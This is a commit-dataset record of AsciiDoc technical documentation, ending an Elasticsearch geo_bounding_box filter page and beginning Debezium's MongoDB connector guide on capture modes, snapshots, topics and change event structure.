See <<geo-bbox-type,Type>> below for further details\nDefault is `memory`.\n|=======================================================================\n\n[float]\n==== Accepted Formats\n\nIn much the same way the geo_point type can accept different\nrepresentation of the geo point, the filter can accept it as well:\n\n[float]\n===== Lat Lon As Properties\n\n[source,js]\n--------------------------------------------------\n{\n \"boost\" : {\n \"must\" : {\n \"match_all\" : {}\n },\n \"filter\" : {\n \"geo_bounding_box\" : {\n \"pin.location\" : {\n \"top_left\" : {\n \"lat\" : 40.73,\n \"lon\" : -74.1\n },\n \"bottom_right\" : {\n \"lat\" : 40.01,\n \"lon\" : -71.12\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\n[float]\n===== Lat Lon As Array\n\nFormat in `[lon, lat]`, note, the order of lon\/lat here in order to\nconform with http:\/\/geojson.org\/[GeoJSON].\n\n[source,js]\n--------------------------------------------------\n{\n \"bool\" : {\n \"must\" : {\n \"match_all\" : {}\n },\n \"filter\" : {\n \"geo_bounding_box\" : {\n \"pin.location\" : {\n \"top_left\" : [-74.1, 40.73],\n \"bottom_right\" : [-71.12, 40.01]\n }\n }\n }\n }\n}\n--------------------------------------------------\n\n[float]\n===== Lat Lon As String\n\nFormat in `lat,lon`.\n\n[source,js]\n--------------------------------------------------\n{\n \"bool\" : {\n \"must\" : {\n \"match_all\" : {}\n },\n \"filter\" : {\n \"geo_bounding_box\" : {\n \"pin.location\" : {\n \"top_left\" : \"40.73, -74.1\",\n \"bottom_right\" : \"40.01, -71.12\"\n }\n }\n }\n }\n}\n--------------------------------------------------\n\n[float]\n===== Geohash\n\n[source,js]\n--------------------------------------------------\n{\n \"bool\" : {\n \"must\" : {\n \"match_all\" : {}\n },\n \"filter\" : {\n \"geo_bounding_box\" : {\n \"pin.location\" : {\n \"top_left\" : \"dr5r9ydj2y73\",\n \"bottom_right\" : \"drj7teegpus6\"\n }\n }\n }\n }\n}\n--------------------------------------------------\n\n[float]\n==== Vertices\n\nThe vertices of the bounding box can either be set by `top_left` and\n`bottom_right` or by `top_right` and `bottom_left` parameters. More\nover the names `topLeft`, `bottomRight`, `topRight` and `bottomLeft`\nare supported. Instead of setting the values pairwise, one can use\nthe simple names `top`, `left`, `bottom` and `right` to set the\nvalues separately.\n\n[source,js]\n--------------------------------------------------\n{\n \"bool\" : {\n \"must\" : {\n \"match_all\" : {}\n },\n \"filter\" : {\n \"geo_bounding_box\" : {\n \"pin.location\" : {\n \"top\" : -74.1,\n \"left\" : 40.73,\n \"bottom\" : -71.12,\n \"right\" : 40.01\n }\n }\n }\n }\n}\n--------------------------------------------------\n\n\n[float]\n==== geo_point Type\n\nThe filter *requires* the `geo_point` type to be set on the relevant\nfield.\n\n[float]\n==== Multi Location Per Document\n\nThe filter can work with multiple locations \/ points per document. Once\na single location \/ point matches the filter, the document will be\nincluded in the filter\n\n[float]\n[[geo-bbox-type]]\n==== Type\n\nThe type of the bounding box execution by default is set to `memory`,\nwhich means in memory checks if the doc falls within the bounding box\nrange. In some cases, an `indexed` option will perform faster (but note\nthat the `geo_point` type must have lat and lon indexed in this case).\nNote, when using the indexed option, multi locations per document field\nare not supported. 
Here is an example:\n\n[source,js]\n--------------------------------------------------\n{\n \"bool\" : {\n \"must\" : {\n \"match_all\" : {}\n },\n \"filter\" : {\n \"geo_bounding_box\" : {\n \"pin.location\" : {\n \"top_left\" : {\n \"lat\" : 40.73,\n \"lon\" : -74.1\n },\n \"bottom_right\" : {\n \"lat\" : 40.10,\n \"lon\" : -71.12\n }\n },\n \"type\" : \"indexed\"\n }\n }\n }\n}\n--------------------------------------------------\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4e40c2fd03237039c4a927c8a4cd5bdf58d3fb6e","subject":"DBZ-4733 Listing mongodb.connection.string in MongoDB property docs","message":"DBZ-4733 Listing mongodb.connection.string in MongoDB property docs\n","repos":"debezium\/debezium,debezium\/debezium,debezium\/debezium,debezium\/debezium","old_file":"documentation\/modules\/ROOT\/pages\/connectors\/mongodb.adoc","new_file":"documentation\/modules\/ROOT\/pages\/connectors\/mongodb.adoc","new_contents":"\/\/ Category: debezium-using\n\/\/ Type: assembly\n[id=\"debezium-connector-for-mongodb\"]\n= {prodname} connector for MongoDB\n\n:context: mongodb\n:data-collection: collection\n:mbean-name: {context}\n:connector-file: {context}\n:connector-class: MongoDb\n:connector-name: MongoDB\nifdef::community[]\n\n:toc:\n:toc-placement: macro\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\ntoc::[]\nendif::community[]\n\n{prodname}'s MongoDB connector tracks a MongoDB replica set or a MongoDB sharded cluster for document changes in databases and collections, recording those changes as events in Kafka topics.\nThe connector automatically handles the addition or removal of shards in a sharded cluster, changes in membership of each replica set, elections within each replica set, and awaiting the resolution of communications problems.\n\nifdef::community[]\nFor information about the MongoDB versions that are compatible with this connector, see the link:https:\/\/debezium.io\/releases\/[{prodname} release overview].\nendif::community[]\nifdef::product[]\nFor information about the MongoDB versions that are compatible with this connector, see the link:{LinkDebeziumSupportedConfigurations}[{NameDebeziumSupportedConfigurations}].\nendif::product[]\n\nifdef::product[]\n\nInformation and procedures for using a {prodname} MongoDB connector is organized as follows:\n\n* xref:overview-of-debezium-mongodb-connector[]\n* xref:how-debezium-mongodb-connectors-work[]\n* xref:descriptions-of-debezium-mongodb-connector-data-change-events[]\n* xref:setting-up-mongodb-to-work-with-debezium[]\n* xref:deployment-of-debezium-mongodb-connectors[]\n* xref:monitoring-debezium-mongodb-connector-performance[]\n* xref:how-debezium-mongodb-connectors-handle-faults-and-problems[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ Title: Overview of {prodname} MongoDB connector\n\/\/ ModuleID: overview-of-debezium-mongodb-connector\n[[mongodb-overview]]\n== Overview\n\nMongoDB's replication mechanism provides redundancy and high availability, and is the preferred way to run MongoDB in production.\nMongoDB connector captures the changes in a replica set or sharded cluster.\n\nA MongoDB _replica set_ consists of a set of servers that all have copies of the same data, and replication ensures that all changes made by clients to documents on the replica set's _primary_ are correctly applied to the other replica set's servers, called _secondaries_.\nMongoDB replication works by having the primary record the changes in its _oplog_ (or operation log), and then each of 
the secondaries reads the primary's oplog and applies in order all of the operations to their own documents.\nWhen a new server is added to a replica set, that server first performs an https:\/\/docs.mongodb.com\/manual\/core\/replica-set-sync\/[snapshot] of all of the databases and collections on the primary, and then reads the primary's oplog to apply all changes that might have been made since it began the snapshot.\nThis new server becomes a secondary (and able to handle queries) when it catches up to the tail of the primary's oplog.\n\nMongoDB connector supports two distinct modes of capturing the changes controlled by the xref:mongodb-property-capture-mode[`capture.mode`] option:\n\n* oplog based\n* change streams based\n\n'''\n\n=== Oplog capture mode (legacy)\n\nThe {prodname} MongoDB connector uses the same replication mechanism as described above, though it does not actually become a member of the replica set.\nJust like MongoDB secondaries, however, the connector always reads the oplog of the replica set's primary.\nAnd, when the connector sees a replica set for the first time, it looks at the oplog to get the last recorded transaction and then performs a snapshot of the primary's databases and collections.\nWhen all the data is copied, the connector then starts streaming changes from the position it read earlier from the oplog. Operations in the MongoDB oplog are https:\/\/docs.mongodb.com\/manual\/core\/replica-set-oplog\/[idempotent], so no matter how many times the operations are applied, they result in the same end state.\n\nThe disadvantage of this mode is that only _insert_ change events will contain the full document, whereas _update_ events only contain a representation of changed fields (i.e. unmodified fields cannot be obtained from an _update_ event), and _delete_ events contain no representation of the deleted document apart from its key.\n\nThis mode should be considered as the legacy one.\nIt is not supported on MongoDB 5 and the user is strongly advised to not use it for MongoDB 4.x server.\n\n=== Change Stream mode\n\nThe {prodname} MongoDB connector uses a similar replication mechanism to the one described above, though it does not actually become a member of the replica set.\nThe main difference is that the connector does not read the oplog directly, but delegates capturing and decoding the oplog to MongoDB's https:\/\/docs.mongodb.com\/manual\/changeStreams\/[Change Streams] feature.\nWith change streams, the MongoDB server exposes changes to collections as an event stream.\nThe {prodname} connector watches the stream and delivers the changes downstream.\nAnd, when the connector sees a replica set for the first time, it looks at the oplog to get the last recorded transaction and then performs a snapshot of the primary's databases and collections.\nWhen all the data is copied, the connector then creates a change stream from the position it read earlier from the oplog.\n\nThis is the recommended mode starting with MongoDB 4.x.\n\n[WARNING]\n====\nBoth capture modes use different values stored in offsets that allow them to resume streaming from the last position seen after a connector restart.\nThus it is not possible to switch from the change streams mode to the oplog mode.\nTo prevent any inadvertent capture mode changes, the connector has a built-in safety check.\n\nWhen the connector is started it checks the stored offsets.\nIf the original capture mode was oplog-based and the new mode is change streams based, then it will try to migrate to change 
streams.\nIf the original capture mode was change streams based, it will keep using change streams, also if the new mode is oplog-based, and a warning about this will be emitted to the logs.\n====\n\nAs the MongoDB connector processes changes, it periodically records the position in the oplog\/stream where the event originated.\nWhen the connector stops, it records the last oplog\/stream position that it processed, so that upon restart it simply begins streaming from that position.\nIn other words, the connector can be stopped, upgraded or maintained, and restarted some time later, and it will pick up exactly where it left off without losing a single event.\nOf course, MongoDB's oplogs are usually capped at a maximum size, which means that the connector should not be stopped for too long, or else some of the operations in the oplog might be purged before the connector has a chance to read them.\nIn this case, upon restart the connector will detect the missing oplog operations, perform a snapshot, and then proceed with streaming the changes.\n\nThe MongoDB connector is also quite tolerant of changes in membership and leadership of the replica sets, of additions or removals of shards within a sharded cluster, and network problems that might cause communication failures.\nThe connector always uses the replica set's primary node to stream changes, so when the replica set undergoes an election and a different node becomes primary, the connector will immediately stop streaming changes, connect to the new primary, and start streaming changes using the new primary node.\nLikewise, if connector experiences any problems communicating with the replica set primary, it will try to reconnect (using exponential backoff so as to not overwhelm the network or replica set) and continue streaming changes from where it last left off.\nIn this way the connector is able to dynamically adjust to changes in replica set membership and to automatically handle communication failures.\n\n.Additional resources\n\n* link:https:\/\/docs.mongodb.com\/manual\/replication\/[Replication mechanism]\n* link:https:\/\/docs.mongodb.com\/manual\/tutorial\/deploy-replica-set\/[Replica set]\n* link:https:\/\/docs.mongodb.com\/manual\/core\/replica-set-elections\/[Replica set elections]\n* link:https:\/\/docs.mongodb.com\/manual\/core\/sharded-cluster-components\/[Sharded cluster]\n* link:https:\/\/docs.mongodb.com\/manual\/tutorial\/add-shards-to-shard-cluster\/[Shard addition]\n* link:https:\/\/docs.mongodb.com\/manual\/tutorial\/remove-shards-from-cluster\/[Shard removal]\n* link:https:\/\/docs.mongodb.com\/manual\/changeStreams\/[Change Streams]\n\n\/\/ Type: assembly\n\/\/ ModuleID: how-debezium-mongodb-connectors-work\n\/\/ Title: How {prodname} MongoDB connectors work\n[[how-the-mongodb-connector-works]]\n== How the MongoDB connector works\n\nAn overview of the MongoDB topologies that the connector supports is useful for planning your application.\n\nWhen a MongoDB connector is configured and deployed, it starts by connecting to the MongoDB servers at the seed addresses, and determines the details about each of the available replica sets.\nSince each replica set has its own independent oplog, the connector will try to use a separate task for each replica set.\nThe connector can limit the maximum number of tasks it will use, and if not enough tasks are available the connector will assign multiple replica sets to each task, although the task will still use a separate thread for each replica set.\n\n[NOTE]\n====\nWhen running 
the connector against a sharded cluster, use a value of `tasks.max` that is greater than the number of replica sets.\nThis will allow the connector to create one task for each replica set, and will let Kafka Connect coordinate, distribute, and manage the tasks across all of the available worker processes.\n====\n\nifdef::product[]\nThe following topics provide details about how the {prodname} MongoDB connector works:\n\n* xref:mongodb-topologies-supported-by-debezium-connectors[]\n* xref:how-debezium-mongodb-connectors-use-logical-names-for-replica-sets-and-sharded-clusters[]\n* xref:how-debezium-mongodb-connectors-perform-snapshots[]\n* xref:how-the-debezium-mongodb-connector-streams-change-event-records[]\n* xref:default-names-of-kafka-topics-that-receive-debezium-mongodb-change-event-records[]\n* xref:how-event-keys-control-topic-partitioning-for-the-debezium-mongodb-connector[]\n* xref:debezium-mongodb-connector-generated-events-that-represent-transaction-boundaries[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: mongodb-topologies-supported-by-debezium-connectors\n\/\/ Title: MongoDB topologies supported by {prodname} connectors\n[[supported-mongodb-topologies]]\n=== Supported MongoDB topologies\n\nThe MongoDB connector supports the following MongoDB topologies:\n\n[[mongodb-replicaset]]\nMongoDB replica set::\nThe {prodname} MongoDB connector can capture changes from a single https:\/\/docs.mongodb.com\/manual\/replication\/[MongoDB replica set].\nProduction replica sets require a minimum of https:\/\/docs.mongodb.com\/manual\/core\/replica-set-architecture-three-members\/[at least three members].\n+\nTo use the MongoDB connector with a replica set, provide the addresses of one or more replica set servers as _seed addresses_ through the connector's `mongodb.hosts` property.\nThe connector will use these seeds to connect to the replica set, and then once connected will get from the replica set the complete set of members and which member is primary.\nThe connector will start a task to connect to the primary and capture the changes from the primary's oplog.\nWhen the replica set elects a new primary, the task will automatically switch over to the new primary.\n+\n[NOTE]\n====\nWhen MongoDB is fronted by a proxy (such as with Docker on OS X or Windows), then when a client connects to the replica set and discovers the members, the MongoDB client will exclude the proxy as a valid member and will attempt and fail to connect directly to the members rather than go through the proxy.\n\nIn such a case, set the connector's optional `mongodb.members.auto.discover` configuration property to `false` to instruct the connector to forgo membership discovery and instead simply use the first seed address (specified via the `mongodb.hosts` property) as the primary node.\nThis may work, but still make cause issues when election occurs.\n====\n\n[[mongodb-sharded-cluster]]\nMongoDB sharded cluster::\nA https:\/\/docs.mongodb.com\/manual\/sharding\/[MongoDB sharded cluster] consists of:\n* One or more _shards_, each deployed as a replica set;\n* A separate replica set that acts as the cluster's _configuration server_\n* One or more _routers_ (also called `mongos`) to which clients connect and that routes requests to the appropriate shards\n+\nTo use the MongoDB connector with a sharded cluster, configure the connector with the host addresses of the _configuration server_ replica set. 
When the connector connects to this replica set, it discovers that it is acting as the configuration server for a sharded cluster, discovers the information about each replica set used as a shard in the cluster, and will then start up a separate task to capture the changes from each replica set. If new shards are added to the cluster or existing shards removed, the connector will automatically adjust its tasks accordingly.\n\n[[mongodb-standalone-server]]\nMongoDB standalone server::\nThe MongoDB connector is not capable of monitoring the changes of a standalone MongoDB server, since standalone servers do not have an oplog.\nThe connector will work if the standalone server is converted to a replica set with one member.\n\n[NOTE]\n====\nMongoDB does not recommend running a standalone server in production.\nFor more information, see the https:\/\/docs.mongodb.com\/manual\/core\/replica-set-architectures\/[MongoDB documentation].\n====\n\n\/\/ Type: concept\n\/\/ Title: How {prodname} MongoDB connectors use logical names for replica sets and sharded clusters\n\/\/ ModuleID: how-debezium-mongodb-connectors-use-logical-names-for-replica-sets-and-sharded-clusters\n[[mongodb-logical-connector-name]]\n=== Logical connector name\n\nThe connector configuration property `mongodb.name` serves as a _logical name_ for the MongoDB replica set or sharded cluster.\nThe connector uses the logical name in a number of ways: as the prefix for all topic names, and as a unique identifier when recording the oplog\/change stream position of each replica set.\n\nYou should give each MongoDB connector a unique logical name that meaningfully describes the source MongoDB system.\nWe recommend logical names begin with an alphabetic or underscore character, and remaining characters that are alphanumeric or underscore.\n\n\/\/ Type: concept\n\/\/ Title: How {prodname} MongoDB connectors perform snapshots\n\/\/ ModuleID: how-debezium-mongodb-connectors-perform-snapshots\n[[mongodb-performing-a-snapshot]]\n=== Performing a snapshot\n\nWhen a task starts up using a replica set, it uses the connector's logical name and the replica set name to find an _offset_ that describes the position where the connector previously stopped reading changes.\nIf an offset can be found and it still exists in the oplog, then the task immediately proceeds with xref:{link-mongodb-connector}#mongodb-streaming-changes[streaming changes], starting at the recorded offset position.\n\nHowever, if no offset is found or if the oplog no longer contains that position, the task must first obtain the current state of the replica set contents by performing a _snapshot_.\nThis process starts by recording the current position of the oplog and recording that as the offset (along with a flag that denotes a snapshot has been started).\nThe task will then proceed to copy each collection, spawning as many threads as possible (up to the value of the `snapshot.max.threads` configuration property) to perform this work in parallel.\nThe connector will record a separate _read event_ for each document it sees, and that read event will contain the object's identifier, the complete state of the object, and _source_ information about the MongoDB replica set where the object was found.\nThe source information will also include a flag that denotes the event was produced during a snapshot.\n\nThis snapshot will continue until it has copied all collections that match the connector's filters.\nIf the connector is stopped before the tasks' snapshots are completed, upon restart 
the connector begins the snapshot again.\n\n[NOTE]\n====\nTry to avoid task reassignment and reconfiguration while the connector performs snapshots of any replica sets.\nThe connector generates log messages to report on the progress of the snapshot.\nTo provide for the greatest control, run a separate Kafka Connect cluster for each connector.\n====\n\n\/\/ Type: concept\n[id=\"mongodb-ad-hoc-snapshots\"]\n==== Ad hoc snapshots\n\nifdef::product[]\n[IMPORTANT]\n====\nAd hoc snapshots are a Technology Preview feature for the {prodname} MongoDB connector.\nTechnology Preview features are not supported with Red Hat production service-level agreements (SLAs) and might not be functionally complete;\ntherefore, Red Hat does not recommend implementing any Technology Preview features in production environments.\nThis Technology Preview feature provides early access to upcoming product innovations, enabling you to test functionality and provide feedback during the development process.\nFor more information about support scope, see link:https:\/\/access.redhat.com\/support\/offerings\/techpreview\/[Technology Preview Features Support Scope].\n====\nendif::product[]\ninclude::{partialsdir}\/modules\/all-connectors\/con-connector-ad-hoc-snapshots.adoc[leveloffset=+3]\n\n\/\/ Type: concept\n[id=\"mongodb-incremental-snapshots\"]\n==== Incremental snapshots\n\nifdef::product[]\n[IMPORTANT]\n====\nIncremental snapshots are a Technology Preview feature for the {prodname} MongoDB connector.\nTechnology Preview features are not supported with Red Hat production service-level agreements (SLAs) and might not be functionally complete;\ntherefore, Red Hat does not recommend implementing any Technology Preview features in production environments.\nThis Technology Preview feature provides early access to upcoming product innovations, enabling you to test functionality and provide feedback during the development process.\nFor more information about support scope, see link:https:\/\/access.redhat.com\/support\/offerings\/techpreview\/[Technology Preview Features Support Scope].\n====\nendif::product[]\ninclude::{partialsdir}\/modules\/all-connectors\/con-connector-incremental-snapshot.adoc[leveloffset=+3]\n\n[NOTE]\n====\nIncremental snapshots are currently supported for single replica set deployments only.\nifdef::community[]\nThis limitation will be removed in the next version.\nendif::community[]\n====\n\n\/\/ Type: concept\n\/\/ ModuleID: how-the-debezium-mongodb-connector-streams-change-event-records\n\/\/ Title: How the {prodname} MongoDB connector streams change event records\n[[mongodb-streaming-changes]]\n=== Streaming changes\n[[mongodb-tailing-the-oplog]]\n\nAfter the connector task for a replica set records an offset, it uses the offset to determine the position in the oplog where it should start streaming changes.\nThe task then (depending on the configuration) either connects to the replica set's primary node or connects to a replica-set-wide change stream and starts streaming changes from that position.\nIt processes all of create, insert, and delete operations, and converts them into {prodname} xref:{link-mongodb-connector}#mongodb-events[change events].\nEach change event includes the position in the oplog where the operation was found, and the connector periodically records this as its most recent offset.\nThe interval at which the offset is recorded is governed by link:https:\/\/kafka.apache.org\/documentation\/#offset.flush.interval.ms[`offset.flush.interval.ms`], which is a Kafka Connect worker 
configuration property.\n\nWhen the connector is stopped gracefully, the last offset processed is recorded so that, upon restart, the connector will continue exactly where it left off.\nIf the connector's tasks terminate unexpectedly, however, then the tasks may have processed and generated events after it last records the offset but before the last offset is recorded; upon restart, the connector begins at the last _recorded_ offset, possibly generating some the same events that were previously generated just prior to the crash.\n\n[NOTE]\n====\nWhen everything is operating nominally, Kafka consumers will actually see every message *_exactly once_*. However, when things go wrong Kafka can only guarantee consumers will see every message *_at least once_*. Therefore, your consumers need to anticipate seeing messages more than once.\n====\n\nAs mentioned above, the connector tasks always use the replica set's primary node to stream changes from the oplog, ensuring that the connector sees the most up-to-date operations as possible and can capture the changes with lower latency than if secondaries were to be used instead. When the replica set elects a new primary, the connector immediately stops streaming changes, connects to the new primary, and starts streaming changes from the new primary node at the same position. Likewise, if the connector experiences any problems communicating with the replica set members, it tries to reconnect, by using exponential backoff so as to not overwhelm the replica set, and once connected it continues streaming changes from where it last left off. In this way, the connector is able to dynamically adjust to changes in replica set membership and automatically handle communication failures.\n\nTo summarize, the MongoDB connector continues running in most situations. 
Communication problems might cause the connector to wait until the problems are resolved.\n\n\/\/ Type: concept\n\/\/ ModuleID: default-names-of-kafka-topics-that-receive-debezium-mongodb-change-event-records\n\/\/ Title: Default names of Kafka topics that receive {prodname} MongoDB change event records\n[[mongodb-topic-names]]\n=== Topic names\n\nThe MongoDB connector writes events for all insert, update, and delete operations to documents in each collection to a single Kafka topic.\nThe name of the Kafka topics always takes the form _logicalName_._databaseName_._collectionName_, where _logicalName_ is the xref:{link-mongodb-connector}#mongodb-logical-connector-name[logical name] of the connector as specified with the `mongodb.name` configuration property, _databaseName_ is the name of the database where the operation occurred, and _collectionName_ is the name of the MongoDB collection in which the affected document existed.\n\nFor example, consider a MongoDB replica set with an `inventory` database that contains four collections: `products`, `products_on_hand`, `customers`, and `orders`.\nIf the connector monitoring this database were given a logical name of `fulfillment`, then the connector would produce events on these four Kafka topics:\n\n* `fulfillment.inventory.products`\n* `fulfillment.inventory.products_on_hand`\n* `fulfillment.inventory.customers`\n* `fulfillment.inventory.orders`\n\nNotice that the topic names do not incorporate the replica set name or shard name.\nAs a result, all changes to a sharded collection (where each shard contains a subset of the collection's documents) all go to the same Kafka topic.\n\nYou can set up Kafka to {link-kafka-docs}.html#basic_ops_add_topic[auto-create] the topics as they are needed.\nIf not, then you must use Kafka administration tools to create the topics before starting the connector.\n\n\/\/ Type: concept\n\/\/ ModuleID: how-event-keys-control-topic-partitioning-for-the-debezium-mongodb-connector\n\/\/ Title: How event keys control topic partitioning for the {prodname} MongoDB connector\n[[mongodb-partitions]]\n=== Partitions\n\nThe MongoDB connector does not make any explicit determination about how to partition topics for events.\nInstead, it allows Kafka to determine how to partition topics based on event keys.\nYou can change Kafka's partitioning logic by defining the name of the `Partitioner` implementation in the Kafka Connect worker configuration.\n\nKafka maintains total order only for events written to a single topic partition.\nPartitioning the events by key does mean that all events with the same key always go to the same partition.\nThis ensures that all events for a specific document are always totally ordered.\n\n\n\/\/ Type: concept\n\/\/ ModuleID: debezium-mongodb-connector-generated-events-that-represent-transaction-boundaries\n\/\/ Title: {prodname} MongoDB connector-generated events that represent transaction boundaries\n[[mongodb-transaction-metadata]]\n=== Transaction Metadata\n\n{prodname} can generate events that represents transaction metadata boundaries and enrich change data event messages.\n\n[NOTE]\n.Limits on when {prodname} receives transaction metadata\n====\n{prodname} registers and receives metadata only for transactions that occur after you deploy the connector.\nMetadata for transactions that occur before you deploy the connector is not available.\n====\n\nFor every transaction `BEGIN` and `END`, {prodname} generates an event that contains the following fields:\n\n`status`:: `BEGIN` or `END`\n`id`:: 
String representation of unique transaction identifier.\n`event_count` (for `END` events):: Total number of events emitted by the transaction.\n`data_collections` (for `END` events):: An array of pairs of `data_collection` and `event_count` that provides number of events emitted by changes originating from given data collection.\n\nThe following example shows a typical message:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"status\": \"BEGIN\",\n \"id\": \"1462833718356672513\",\n \"event_count\": null,\n \"data_collections\": null\n}\n\n{\n \"status\": \"END\",\n \"id\": \"1462833718356672513\",\n \"event_count\": 2,\n \"data_collections\": [\n {\n \"data_collection\": \"rs0.testDB.collectiona\",\n \"event_count\": 1\n },\n {\n \"data_collection\": \"rs0.testDB.collectionb\",\n \"event_count\": 1\n }\n ]\n}\n----\n\nUnless overridden via the xref:{link-mongodb-connector}#mongodb-property-topic-transaction[`topic.transaction`] option,\ntransaction events are written to the topic named xref:mongodb-property-mongodb-name[`_<mongodb.name>_`]`.transaction`.\n\n.Change data event enrichment\nWhen transaction metadata is enabled, the data message `Envelope` is enriched with a new `transaction` field.\nThis field provides information about every event in the form of a composite of fields:\n\n`id`:: String representation of unique transaction identifier.\n`total_order`:: The absolute position of the event among all events generated by the transaction.\n`data_collection_order`:: The per-data collection position of the event among all events that were emitted by the transaction.\n\nFollowing is an example of what a message looks like:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"patch\": null,\n \"after\": \"{\\\"_id\\\" : {\\\"$numberLong\\\" : \\\"1004\\\"},\\\"first_name\\\" : \\\"Anne\\\",\\\"last_name\\\" : \\\"Kretchmar\\\",\\\"email\\\" : \\\"annek@noanswer.org\\\"}\",\n \"source\": {\n...\n },\n \"op\": \"c\",\n \"ts_ms\": \"1580390884335\",\n \"transaction\": {\n \"id\": \"1462833718356672513\",\n \"total_order\": \"1\",\n \"data_collection_order\": \"1\"\n }\n}\n----\n\n\/\/ Type: assembly\n\/\/ ModuleID: descriptions-of-debezium-mongodb-connector-data-change-events\n\/\/ Title: Descriptions of {prodname} MongoDB connector data change events\n[[mongodb-events]]\n== Data change events\n\nThe {prodname} MongoDB connector generates a data change event for each document-level operation that inserts, updates, or deletes data. Each event contains a key and a value. The structure of the key and the value depends on the collection that was changed.\n\n{prodname} and Kafka Connect are designed around _continuous streams of event messages_. However, the structure of these events may change over time, which can be difficult for consumers to handle. To address this, each event contains the schema for its content or, if you are using a schema registry, a schema ID that a consumer can use to obtain the schema from the registry. This makes each event self-contained.\n\nThe following skeleton JSON shows the basic four parts of a change event. However, how you configure the Kafka Connect converter that you choose to use in your application determines the representation of these four parts in change events. A `schema` field is in a change event only when you configure the converter to produce it. Likewise, the event key and event payload are in a change event only if you configure a converter to produce it. 
If you use the JSON converter and you configure it to produce all four basic change event parts, change events have this structure:\n\n[source,json,index=0]\n----\n{\n \"schema\": { \/\/ <1>\n ...\n },\n \"payload\": { \/\/ <2>\n ...\n },\n \"schema\": { \/\/ <3>\n ...\n },\n \"payload\": { \/\/ <4>\n ...\n },\n}\n----\n\n.Overview of change event basic content\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The first `schema` field is part of the event key. It specifies a Kafka Connect schema that describes what is in the event key's `payload` portion. In other words, the first `schema` field describes the structure of the key for the document that was changed.\n\n|2\n|`payload`\n|The first `payload` field is part of the event key. It has the structure described by the previous `schema` field and it contains the key for the document that was changed.\n\n|3\n|`schema`\n|The second `schema` field is part of the event value. It specifies the Kafka Connect schema that describes what is in the event value's `payload` portion. In other words, the second `schema` describes the structure of the document that was changed. Typically, this schema contains nested schemas.\n\n|4\n|`payload`\n|The second `payload` field is part of the event value. It has the structure described by the previous `schema` field and it contains the actual data for the document that was changed.\n\n|===\n\nBy default, the connector streams change event records to topics with names that are the same as the event's originating collection. See xref:{link-mongodb-connector}#mongodb-topic-names[topic names].\n\n[WARNING]\n====\nThe MongoDB connector ensures that all Kafka Connect schema names adhere to the link:http:\/\/avro.apache.org\/docs\/current\/spec.html#names[Avro schema name format]. This means that the logical server name must start with a Latin letter or an underscore, that is, a-z, A-Z, or \\_. Each remaining character in the logical server name and each character in the database and collection names must be a Latin letter, a digit, or an underscore, that is, a-z, A-Z, 0-9, or \\_. If there is an invalid character it is replaced with an underscore character.\n\nThis can lead to unexpected conflicts if the logical server name, a database name, or a collection name contains invalid characters, and the only characters that distinguish names from one another are invalid and thus replaced with underscores.\n====\n\n\nifdef::product[]\nFor more information, see the following topics:\n\n* xref:about-keys-in-debezium-mongodb-change-events[]\n* xref:about-values-in-debezium-mongodb-change-events[]\nendif::product[]\n\n\n\/\/ Type: concept\n\/\/ ModuleID: about-keys-in-debezium-mongodb-change-events\n\/\/ Title: About keys in {prodname} MongoDB change events\n[[mongodb-change-events-key]]\n=== Change event keys\n\nA change event's key contains the schema for the changed document's key and the changed document's actual key. 
For a given collection, both the schema and its corresponding payload contain a single `id` field.\nThe value of this field is the document's identifier represented as a string that is derived from link:https:\/\/docs.mongodb.com\/manual\/reference\/mongodb-extended-json\/[MongoDB extended JSON serialization strict mode].\n\nConsider a connector with a logical name of `fulfillment`, a replica set containing an `inventory` database, and a `customers` collection that contains documents such as the following.\n\n.Example document\n[source,json,indent=0]\n----\n {\n \"_id\": 1004,\n \"first_name\": \"Anne\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n }\n----\n\n.Example change event key\nEvery change event that captures a change to the `customers` collection has the same event key schema. For as long as the `customers` collection has the previous definition, every change event that captures a change to the `customers` collection has the following key structure. In JSON, it looks like this:\n\n[source,json,indent=0]\n----\n {\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"name\": \"fulfillment.inventory.customers.Key\", \/\/ <2>\n \"optional\": false, \/\/ <3>\n \"fields\": [ \/\/ <4>\n {\n \"field\": \"id\",\n \"type\": \"string\",\n \"optional\": false\n }\n ]\n },\n \"payload\": { \/\/ <5>\n \"id\": \"1004\"\n }\n }\n----\n\n.Description of change event key\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The schema portion of the key specifies a Kafka Connect schema that describes what is in the key's `payload` portion.\n\n|2\n|`fulfillment.inventory.customers.Key`\na|Name of the schema that defines the structure of the key's payload. This schema describes the structure of the key for the document that was changed. Key schema names have the format _connector-name_._database-name_._collection-name_.`Key`. In this example: +\n\n* `fulfillment` is the name of the connector that generated this event. +\n* `inventory` is the database that contains the collection that was changed. +\n* `customers` is the collection that contains the document that was updated.\n\n|3\n|`optional`\n|Indicates whether the event key must contain a value in its `payload` field. In this example, a value in the key's payload is required. A value in the key's payload field is optional when a document does not have a key.\n\n|4\n|`fields`\n|Specifies each field that is expected in the `payload`, including each field's name, type, and whether it is required.\n\n|5\n|`payload`\n|Contains the key for the document for which this change event was generated. In this example, the key contains a single `id` field of type `string` whose value is `1004`.\n\n|===\n\nThis example uses a document with an integer identifier, but any valid MongoDB document identifier works the same way, including a document identifier. For a document identifier, an event key's `payload.id` value is a string that represents the updated document's original `_id` field as a MongoDB extended JSON serialization that uses strict mode. 
